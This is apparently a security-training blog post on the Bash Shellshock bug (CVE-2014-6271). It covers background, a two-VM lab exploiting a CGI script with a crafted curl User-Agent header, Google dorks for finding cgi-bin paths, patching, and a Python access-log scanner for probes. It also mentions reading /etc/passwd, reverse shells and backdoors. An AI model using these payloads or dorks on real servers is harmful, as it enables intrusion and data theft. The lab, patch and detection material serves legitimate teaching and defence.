SecurityTrainings

Shellshock - the Destroyer

Shellshock is the latest vulnerability, disclosed on 24 September 2014. It is also known as the Bash Bug or Bashdoor. The bug was originally discovered by Stéphane Chazelas on 12 September 2014, who suggested the name "bashdoor" for it. The Common Vulnerabilities and Exposures (CVE) identifier assigned to it is CVE-2014-6271. The bug was being exploited worldwide within hours of its disclosure because of its simplicity, its ease of exploitation and the very wide installed base of Bash.

The CVE identifiers for the related vulnerabilities are CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186 and CVE-2014-7187.

The NIST National Vulnerability Database rates Shellshock 10 on a scale of 10, the highest possible severity: as bad as it gets.

What actually is the Shellshock bug?

It is a vulnerability in the GNU Bash shell that allows an attacker to execute commands remotely on a vulnerable system. Bash is free software, developed by Chet Ramey, a professional software architect, in 1992. Bash is the interpreter the system uses to run commands and scripts/programs on Unix and Linux systems, and it can also act as the interpreter for CGI scripts running on Apache or any other web server. It is the default shell on Linux and Mac OS and is installed on almost every Linux system, which is why the bug is exploitable on so many machines. Bash is also used for administrative functions, including configuring websites, applying updates and many others. Bash can operate as a command as well as an interpreter, so it is possible to execute Bash from within itself.

The attacker crafts an environment variable in such a way that the string following the Bash function definition, that is, arbitrary code, is executed remotely. Environment variables are name/value pairs possessed by each running program. When one program starts another, it provides an initial list of environment variables for the new program. Environment variables whose values begin with parentheses ("()") followed by a function definition are how Bash encodes exported functions when it hands them to a new program instance. The new instance of Bash, upon starting, scans its environment variable list for such values, creates a fragment of code from each value and executes it. Affected versions do not verify that the fragment is only a valid function definition. Therefore an attacker can execute arbitrary commands by placing code in the environment list of a process that then executes Bash.

This security vulnerability affects Bash versions 1.14 (released in 1994) up to the most recent version, 4.3.

Let's get practical:

I exploit this bug using the CGI (Common Gateway Interface) vector. CGI is used for communication between the client and the web server. CGI stores request information in system environment variables that can be accessed by the CGI scripts.

Requirements:

Two VMware machines: one will be the server and the other will be used as the client.

I used BackTrack 5 as the server and Ubuntu as the client.

Test of vulnerability:

First make sure that your system is actually vulnerable; to do that, run this command.

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

If it prints "vulnerable" and "this is a test", then the system is vulnerable to Shellshock.

Now it is time to attack:

On the BackTrack machine (which acts as the server), go to the cgi-bin directory and create a test1.cgi file.

cgi-bin is located at /usr/lib/cgi-bin/. Create test1.cgi there and write in the given code:

#!/bin/bash
echo "Content-type: text/plain"
echo
echo
echo "Hi"

Now restart the Apache service and enter the server's IP address with the path in the browser of the BackTrack machine to check whether it is working.

$ service apache2 restart

172.x.x.x(IP)/cgi-bin/test1.cgi  (enter in the browser)

If it prints "Hi" in the browser, go to the next step; otherwise check the network settings, or the proxy if one is used. Also enter this path in Ubuntu (the other OS); it should print the same "Hi". If not, add the IP to the /etc/hosts file (on the BT 5 server).

Next step (Remote Code Execution):

Use the curl utility to exploit the server. Run this command on the client machine (Ubuntu). If it executes successfully, it creates a "cio" file in the /tmp directory of the server (BackTrack 5).

curl -k -H 'User-Agent: () { :; }; echo cio > /tmp/cio' http://servermachine_ip/cgi-bin/test1.cgi

Since we get "Hi" back, the server is reachable from the client, and the crafted environment variable (the CGI interface exports the User-Agent header to the script as the HTTP_USER_AGENT variable) caused Bash to execute the command after the function definition, creating the cio file in /tmp.

To verify, go to the server and run 'ls /tmp/' in a terminal; if 'cio' is present, we have successfully exploited the bug.

This is a simple command; malware could be placed or a backdoor created in the same way. It is advisable to try this on virtual machines only.

The password file /etc/passwd can be retrieved as well; only the Bash command needs to change.

To find the exact path of cgi-bin, use Google dorks. Some example dorks are:

  • filetype:cgi inurl:cgi-bin
  • filetype:sh inurl:"server-status" intitle:apache "cgi-bin"
  • sitemap.xml filetype:xml intext:"cgi-bin" filetype:sh inurl:cgi-bin site:[your domain]
  • inurl:cgi-bin "GATEWAY_INTERFACE = CGI"
  • inurl:/cgi-sys/entropysearch.cgi
  • inurl:/cgi-sys/FormMail-clone.cgi

Other attacks, such as a reverse TCP shell and DDoS, can also be performed through the curl utility.

Prevention:

Upgrade Bash as soon as possible.

sudo apt-get update && sudo apt-get install --only-upgrade bash  (for Debian/Ubuntu-based Linux)
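The curl request above carries its payload in the User-Agent header, and Apache writes that header, the Referer and the request line to its access log, so probes leave a trace even on a patched server. As an added example that is not part of the original post, here is a small Python scanner over constructed combined-format log lines; it looks for the function-definition prefix, literal or URL-encoded.

```python
import re
from typing import List, Tuple

# Apache "combined" access log format:
#   host ident user [time] "request" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# A Shellshock payload starts with the Bash function-definition prefix "() {",
# either literal or URL-encoded (%28%29 %7B) when it travels in the query string.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{|%28%29(?:%20|\+)?%7B', re.IGNORECASE)

# Constructed sample log lines (not real traffic): a benign request, the probe
# from the curl command above in User-Agent, a probe in Referer, and a
# URL-encoded probe in the request line.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2014:13:55:36 +0000] "GET /cgi-bin/test1.cgi HTTP/1.1" 200 3 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2014:13:56:01 +0000] "GET /cgi-bin/test1.cgi HTTP/1.1" 200 3 "-" "() { :; }; echo cio > /tmp/cio"
10.0.0.9 - - [10/Oct/2014:13:56:12 +0000] "GET /cgi-bin/test1.cgi HTTP/1.1" 200 3 "() { :;}; echo probe" "curl/7.35.0"
10.0.0.12 - - [10/Oct/2014:13:57:40 +0000] "GET /cgi-bin/test1.cgi?x=%28%29%20%7B%20%3A%3B%7D%3B HTTP/1.1" 200 3 "-" "-"
"""


def find_shellshock_probes(log_text: str) -> List[Tuple[str, str, str]]:
    """Return (client_host, request_line, field) for each log line whose
    request, referer or user-agent carries a Bash function-definition prefix."""
    hits = []
    for line in log_text.splitlines():
        m = COMBINED_RE.match(line)
        if not m:
            continue  # not combined format: skip rather than guess
        for field in ("request", "referer", "agent"):
            if SHELLSHOCK_RE.search(m.group(field)):
                hits.append((m.group("host"), m.group("request"), field))
                break  # one finding per line is enough
    return hits


if __name__ == "__main__":
    for host, request, field in find_shellshock_probes(SAMPLE_LOG):
        print(f"{host} sent a Shellshock probe via {field}: {request}")
```

The same prefix is what mod_security and IDS signatures published for CVE-2014-6271 key on; any header a CGI script receives as an environment variable is a possible carrier, not only User-Agent.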

